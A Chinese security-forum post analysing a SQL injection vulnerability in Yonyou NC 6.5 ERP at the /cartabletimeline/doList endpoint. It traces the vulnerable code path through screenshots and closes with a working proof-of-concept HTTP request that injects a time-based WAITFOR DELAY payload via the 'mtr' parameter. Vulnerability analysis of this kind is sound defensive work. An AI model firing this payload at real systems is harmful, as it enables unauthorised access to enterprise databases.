问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
用友NC 漏洞分析--cartabletimeline存在SQL注入
漏洞分析
用友NC是一款大型erp企业管理系统与电子商务平台;用友网络科技股份有限公司用友NC存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
用友NC 漏洞分析--cartabletimeline存在SQL注入 ================================== 漏洞描述 ---- 用友NC是一款大型erp企业管理系统与电子商务平台。用友网络科技股份有限公司用友NC存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 影响版本 ---- 用友NC6.5 漏洞分析 ---- `VsmAction`类中此处存在`@Servlet`注解,也就是说当访问路径为`/cartabletimeline`会直接定位到这里。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-a35f50941ccc055cf3832c1e099039f29c6f6ff0.png) 在`doList`方法上面标注了`@Action`标签,当我们请求`/cartabletimeline/doList`的时候就会进入该`doList`方法。 继续看`doList`方法的详细代码 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-b0776d74fb87de6bc51fe67788fb1d8cddb15a9c.png) 这里接收了一个参数为`mtr`,并且传入`getVehicleApplyInfo`函数来执行,传入时将`sb`变量转为字符串类型。 `getVehicleApplyInfo`函数是`carTalbeService`对象进行调用的,而`carTalbeService`对象是通过`ICarTalbeService`接口来进行实例化。 进入`ICarTalbeService`接口 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-d452d43f4e962265a82dbdbced846882a9ee953f.png) 追踪`ICarTalbeService`接口的实现类 定位到`PsndocServiceImpl`类 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-49a205d284e2ff6bf75efbc05ca645e5ac8abddc.png) 观察`getVehicleApplyInfo`具体实现内容 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-45a0de591e1c322f6860732e9fc34ce5cde132b4.png) 传入参数后调用了`getCarTableQueryService().getgetUserVehicleApplyInfo` 查看`getCarTableQueryService`内容 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-b49c3a7bdbd793e575c3a282cf6691add7030c2d.png) 这里返回的是一个`carTableQueryService`类型的对象,那么去看`carTableQueryService`类中的`getgetUserVehicleApplyInfo`方法 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-edd3b960d443dc7b711b778a2ea83ee821bf6799.png) 跟踪`queryVOs`,定位到`CRUDHelper`类 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-a14072b912a38f72a74d8920c4bc71fd3112427d.png) 类方法`getCRUDService()` 根据传入的类名`AggVOCrudServiceImpl`去加载并返回一个 `ILfwCRUDService` 类型的实例 定位到`ILfwCRUDService`类 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-52cb4bf2b080f934f7794c13e763265627b4e74a.png) 查看`queryVOs`函数内容 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-936c701003533b8a2da270289f94cd0ca8753932.png) 通过服务定位器`ServiceLocator`来获取一个实现了 `ILfwQueryService` 接口的服务实例 定位到`ILfwQueryService`实现类`LfwQueryServiceImpl` 参数`wherePart`不为空,且不以`"where"`字符结尾,则拼接进sql语句 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-4a6713a626ba6a668785bfa75b16aa3a96631e76.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-d35e55876b2b6f926541d453116d653a3566b8c9.png) 至此代码分析结束 漏洞POC ----- ```php GET /portal/pt/cartabletimeline/doList?pageId=login&mtr=1)WAITFOR+DELAY+%270:0:2%27--+ HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: keep-alive Priority: u=4 ``` ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/11/attach-fa86437a31985cded91299cacca7d9ebb25188fe.png)
发表于 2024-11-27 09:00:01
阅读 ( 1272 )
分类:
Web应用
1 推荐
收藏
0 条评论
请先
登录
后评论
WLwl
2 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!